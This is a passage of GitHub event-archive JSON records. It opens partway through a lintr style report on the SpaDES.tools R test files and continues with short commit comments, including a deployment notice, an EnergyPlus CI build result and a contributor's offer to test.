^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:28:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L28) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:31:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L31) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:35:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L35) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:36:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L36) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:37:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L37) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:38:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L38) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:42:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L42) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:44:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L44) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:46:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L46) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:47:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L47) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(biomass))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:49:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L49) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:50:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L50) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:51:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L51) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:52:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L52) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:56:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L56) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:57:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L57) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:60:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L60) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:64:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L64) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0, 15, 0, 15), res = 1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:65:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L65) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes = 5, speedup = 1, p = 0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:67:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L67) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:71:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L71) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu = 4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:73:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L73) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:75:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L75) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:76:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L76) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:77:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L77) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:81:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L81) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:82:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L82) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:85:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L85) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:89:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L89) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:90:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L90) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:91:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L91) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:92:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L92) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:96:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L96) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:98:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L98) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:100:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L100) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:101:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L101) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:102:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L102) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-randomPolygon.R:25:60:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-randomPolygon.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​  expect_true(base::abs(base::abs(polyArea - area)) <  area/4) ## TODO: why is this area/4?\n                                                          ~^~\n```\n[tests/testthat/test-splitRaster.R:148:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-splitRaster.R#L148) *style:* **Commas should always have a space after.**\n```r\n​  expect_identical(dataType(y4[[1]]),\"INT1U\")\n                                     ^\n```\n[tests/testthat/test-splitRaster.R:165:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-splitRaster.R#L165) *style:* **Lines should not be more than 100 characters.**\n```r\n​    tmpdir <- file.path(tempdir(), \"splitRaster-test-parallel\") %>% reproducible::checkPath(create = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:168:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-splitRaster.R#L168) *style:* **Commented code should be removed.**\n```r\n​      #detach(\"package:raster\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:226:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-splitRaster.R#L226) *style:* **Lines should not be more than 100 characters.**\n```r\n​  tmpdir <- file.path(tempdir(), \"splitRaster-test-large\") %>% reproducible::checkPath(create = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:264:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-splitRaster.R#L264) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m)), min(values(r))) ## Error: cannot allocate vector of size 4.8 Gb\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:283:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-splitRaster.R#L283) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(max(values(m1)), max(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:284:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-splitRaster.R#L284) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m1)), min(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread.R:209:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread.R#L209) *style:* **Lines should not be more than 100 characters.**\n```r\n​    if (interactive()) Plot(circEdge, addTo = \"circs\", cols = c(\"transparent\", rainbow(numCircs)[whCirc]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:148:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread2.R#L148) *style:* **Commented code should be removed.**\n```r\n​  #quickDT <- data.table(id = seq_along(sams), initialPixels = sams, key = \"id\")\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:150:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread2.R#L150) *style:* **Commented code should be removed.**\n```r\n​  #cirOut <- quickDT[cirOut, on = ]\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:473:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread2.R#L473) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##                                    expr       min        lq      mean   median        uq       max neval\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:474:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread2.R#L474) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##         iterativeFun(ras, FALSE, n, sp)  3.096979 12.642477  73.02248 35.17520  91.10528  764.4073   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:475:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread2.R#L475) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##      nonIterativeFun(ras, FALSE, n, sp)  1.509484  6.555565  31.18444 14.91066  42.78317  158.5237   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:476:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread2.R#L476) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##           origSpread(ras, FALSE, n, sp)  5.154006  7.555631  14.87158 11.49005  17.50599  231.5487   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:477:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread2.R#L477) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ## origSpreadIterations(ras, FALSE, n, sp) 10.754669 51.524368 141.48620 93.61996 169.10808 2110.2683   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:688:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread2.R#L688) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  ciCentre[seq_len(ncell(ciCentre))[-(ncell(ciCentre) / 2 - ncol(ciCentre) / 2)]] <- NA_integer_\n                                     ^\n```\n[tests/testthat/test-spread2.R:884:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread2.R#L884) *style:* **Lines should not be more than 100 characters.**\n```r\n​                       spreadProb = 0.23, persistProb = 0, iterations = 10, directions = 8L, plot.it = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:886:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread2.R#L886) *style:* **Lines should not be more than 100 characters.**\n```r\n​                      spreadProb = 0.23, persistProb = 0.8, iterations = 10, directions = 8L, plot.it = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:891:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread2.R#L891) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  M <- matrix(0.8, nrow = 50, ncol = 50)\n  ^\n```\n[tests/testthat/test-spread2.R:898:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread2.R#L898) *style:* **Put spaces around all infix operators.**\n```r\n​  start <- c(50, length(landscape)-49)\n                                 ~^~\n```\n[tests/testthat/test-spread2.R:902:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread2.R#L902) *style:* **Lines should not be more than 100 characters.**\n```r\n​                        spreadProb = 0.23, persistProb = persistRas, iterations = 10, directions = 8L,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:916:14:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread2.R#L916) *style:* **Use <-, not =, for assignment.**\n```r\n​  spreadProb = landscape\n             ^\n```\n[tests/testthat/test-spread2.R:918:72:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-spread2.R#L918) *style:* **Commas should always have a space after.**\n```r\n​  expect_silent(spread2(landscape = landscape, spreadProb = spreadProb,start = start,\n                                                                       ^\n```"}},"created_at":"2018-07-14T05:10:03Z"}
{"id":"7965232430","type":"CommitCommentEvent","actor":{"login":"sf50001"},"repo":{"name":"sf50001/root"},"payload":{"comment":{"id":29707789,"position":16,"line":16,"path":".gitignore","commit_id":"8e10564cd9849bbd7be558f667bbc40514ab1efb","created_at":"2018-07-14T05:10:41Z","updated_at":"2018-07-14T05:10:41Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-14T05:10:41Z"}
{"id":"7965235063","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29707791,"position":null,"line":null,"path":null,"commit_id":"60f5e3c7fa4d357d693f077e44371f4b570d0f85","created_at":"2018-07-14T05:13:03Z","updated_at":"2018-07-14T05:13:03Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-051301 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-051301\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-14T05:13:03Z"}
{"id":"7965236244","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707798,"position":null,"line":null,"path":null,"commit_id":"4d89755748773cfc357d0cbaf4f8e2cabc2c81fe","created_at":"2018-07-14T05:14:09Z","updated_at":"2018-07-14T05:14:09Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1686 of 1686 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4d89755748773cfc357d0cbaf4f8e2cabc2c81fe-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4d89755748773cfc357d0cbaf4f8e2cabc2c81fe-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4d89755748773cfc357d0cbaf4f8e2cabc2c81fe-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.17%25-green.png)</a>\n"}},"created_at":"2018-07-14T05:14:09Z"}
{"id":"7965238698","type":"CommitCommentEvent","actor":{"login":"nolsen42"},"repo":{"name":"PrivateBin/PrivateBin"},"payload":{"comment":{"id":29707804,"position":null,"line":null,"path":null,"commit_id":"e35342e3a43df2c9ecb99a7dc0976093343ee550","created_at":"2018-07-14T05:16:26Z","updated_at":"2018-07-14T05:16:26Z","author_association":"CONTRIBUTOR","body":"I can test this for you, even if I haven't used cloudflare for my pastebin recently."}},"created_at":"2018-07-14T05:16:26Z"}
